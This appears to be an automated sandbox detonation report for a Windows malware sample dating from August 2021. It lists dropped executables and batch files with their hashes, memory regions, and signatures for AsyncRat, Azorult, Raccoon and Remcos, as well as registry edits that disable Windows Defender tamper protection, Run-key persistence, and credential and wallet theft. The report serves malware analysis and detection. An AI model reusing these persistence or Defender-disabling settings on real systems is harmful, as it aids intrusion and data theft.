C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 74027813e8cfccc5e9c4dd335fe2eb8c
SHA1 440cc9a282a9fde743ab238329ea703ec4b0e31a
SHA256 9ee3ab8572c1745a3210f6517a5cd01e7e96591efe181d10119cf2c3df818c52
SHA512 8337a406694f547fcbd92118587dd1a57db86eceef9cb88ab4f4eaa15f361a43f57695f19793a27540426ede3bf58f479f5e4bbb1bbb91395390a7328847ce13

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6adf28c5f1ad2f7ee305c5467c2023df
SHA1 d141738df05f1d0678cd3c443810a4b80f8ff114
SHA256 32b94ce0d4addc5b056e30eda5e6861d71f4d60c76af75d963316ce16fe57d74
SHA512 5cdf89f3e884178045bd34fb04cddf3433dfab351473c5aed9a303ec49f7a143d3249e2e048ae459a58485571982cf99a9c6367d1c77d7a58b1620f31eeeb8e0

memory/1688-160-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1688-161-0x0000000000400000-0x0000000000405000-memory.dmp

\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1712-162-0x0000000000000000-mapping.dmp

memory/1688-163-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1688-169-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1848-168-0x0000000000000000-mapping.dmp

memory/1688-165-0x00000000004019E4-mapping.dmp

memory/688-170-0x0000000000000000-mapping.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/1380-172-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/1460-175-0x0000000000000000-mapping.dmp

memory/1396-176-0x0000000000000000-mapping.dmp

memory/1924-177-0x0000000000000000-mapping.dmp

memory/1712-179-0x0000000000100000-0x0000000000101000-memory.dmp

memory/1712-181-0x0000000010580000-0x00000000105F3000-memory.dmp

memory/1712-180-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/1712-178-0x0000000000080000-0x0000000000081000-memory.dmp

memory/1712-182-0x0000000000400000-0x0000000000470000-memory.dmp

memory/1912-183-0x0000000000000000-mapping.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/1848-185-0x0000000000000000-mapping.dmp

memory/564-188-0x0000000004C30000-0x0000000004CA2000-memory.dmp

memory/1176-187-0x0000000001FC0000-0x0000000002037000-memory.dmp

memory/2000-186-0x00000000048A0000-0x0000000004912000-memory.dmp

memory/2000-189-0x0000000000B60000-0x0000000000B80000-memory.dmp

memory/1176-190-0x0000000004840000-0x0000000004866000-memory.dmp

memory/564-191-0x00000000020B0000-0x00000000020CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/956-195-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1844-197-0x000000000040616E-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/956-196-0x0000000000403BEE-mapping.dmp

memory/1844-193-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/956-200-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1844-202-0x0000000000400000-0x000000000040C000-memory.dmp

memory/860-204-0x0000000000000000-mapping.dmp

memory/1368-205-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp

MD5 21e61c6e6362bf22646b4c88071f6b5f
SHA1 eef3aef98ce21d17c7cae27f0bce63f098b37f1b
SHA256 18c0e6c54a05a9ef9889201b1cb07a35af8bf6251486ca0b163205f6048cf2d7
SHA512 43bd654ddc31b28de00978a3086594c1e7e93dbfbe3b54763972cfe9eccf30c2ab4bbfd3dd59f77bf8de0765e85bc20a1625d8b49b9d688f845b2b387dd90632

memory/1460-209-0x0000000000000000-mapping.dmp

memory/1844-212-0x0000000000450000-0x0000000000451000-memory.dmp

C:\Windows\temp\udz2b2rb.inf

MD5 994f81fd890986436aac86037ed80fa7
SHA1 59945339f09682445ba9a57f86fdc94d13c0a337
SHA256 27141842f4689f5d32e01800ae117d8d93b49ffabe21acbb1fa7c2298c547eb0
SHA512 70a7c61af50ac31e1c6068d278f3697a2be84f09b3384418d6d717ab45ecab4d726564a067856f2528f94c5c1ce2a6634ccd8c0cc76c1dc6fd8ffbf0c4c21096

memory/860-215-0x0000000004980000-0x0000000004981000-memory.dmp

memory/2032-217-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1844-216-0x0000000000455000-0x0000000000466000-memory.dmp

\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2032-218-0x000000000040C71E-mapping.dmp

memory/860-211-0x0000000000A80000-0x0000000000A81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2032-221-0x0000000000400000-0x0000000000412000-memory.dmp

memory/860-220-0x00000000049C0000-0x00000000049C1000-memory.dmp

memory/860-223-0x0000000002540000-0x0000000002541000-memory.dmp

memory/860-224-0x0000000004982000-0x0000000004983000-memory.dmp

memory/1844-225-0x0000000000466000-0x0000000000467000-memory.dmp

memory/860-226-0x0000000004770000-0x0000000004771000-memory.dmp

memory/860-229-0x0000000005630000-0x0000000005631000-memory.dmp

memory/860-234-0x00000000060A0000-0x00000000060A1000-memory.dmp

memory/860-235-0x00000000062B0000-0x00000000062B1000-memory.dmp

memory/860-259-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/2032-261-0x00000000020C0000-0x00000000020C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/988-263-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/988-265-0x0000000000220000-0x0000000000221000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RNQMQDEL\Bdojytwvbcgagbvmwkdspythmuhhgvq[1]

MD5 0381b7281382fd974fa960f89f893d92
SHA1 e49a5832692ef9bda4bf8a7e55765b154e37bc12
SHA256 0dc7f9eef6ad651077ea0f77b2963d5fecb0f1cdc8f229a207e3b94c42b33d37
SHA512 41a35220bd15777177fde4031021341fa140cd6f92fb0a549eabcd7286d7d507d4121d6fdebe5db57faa0eef475d56a998e1c529cc0cc0a6f3c59d2a328039c6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1572-272-0x00000000004019E4-mapping.dmp

memory/464-276-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1008-277-0x0000000000000000-mapping.dmp

memory/1008-279-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/1620-285-0x00000000004019E4-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-13 11:33

Reported

2021-08-13 11:36

Platform

win10v20210408

Max time kernel

119s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3728 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3728 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3728 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3728 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3728 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3728 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3728 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3728 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3728 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3728 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3172 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3172 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3172 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3172 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2724 wrote to memory of 1392 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2724 wrote to memory of 1392 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2724 wrote to memory of 1392 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2724 wrote to memory of 1392 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3620 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
